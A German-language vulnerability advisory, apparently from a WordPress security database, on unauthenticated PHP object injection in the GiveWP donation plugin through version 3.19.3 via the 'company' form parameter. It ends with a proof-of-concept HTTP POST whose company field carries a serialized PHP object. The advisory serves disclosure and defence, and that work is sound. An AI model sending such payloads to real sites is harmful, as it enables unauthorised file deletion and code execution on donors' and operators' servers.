
GiveWP – Spenden-Plugin und Fundraising-Plattform <= 3.19.3 - Nicht authentifizierte PHP-Objekt-Injektion
GiveWP – Donation Plugin and Fundraising Platform <= 3.19.3 - Nicht authentifizierte PHP-Objektinjektion
Das WordPress-Plugin GiveWP – Donation Plugin and Fundraising Platform ist in allen Versionen bis einschließlich 3.19.3 anfällig für PHP-Objektinjektion durch die Deserialisierung nicht vertrauenswürdiger Eingaben aus dem Spendenformular über den Parameter 'company'. Dadurch ist es nicht authentifizierten Angreifern möglich, ein PHP-Objekt einzuschleusen. Das zusätzliche Vorhandensein einer POP-Kette ermöglicht es Angreifern, beliebige Dateien auf dem Server zu löschen, wodurch Remote Code Execution möglich wird. Bitte beachten Sie, dass dies einen Bypass des Fixes für CVE-2024-12877 darstellt.
POST /?givewp-route=donate&givewp-route-signature=[SIGNATURE]&givewp-route-signature-id=givewp-donate&givewp-route-signature-expiration=[EXPIRY] HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
amount=10¤cy=USD&gatewayId=manual&formId=90&company=O:20:"PHP_Object_Injection":0:{}&firstName=Test&[email protected]&donationType=single&donationBirthday=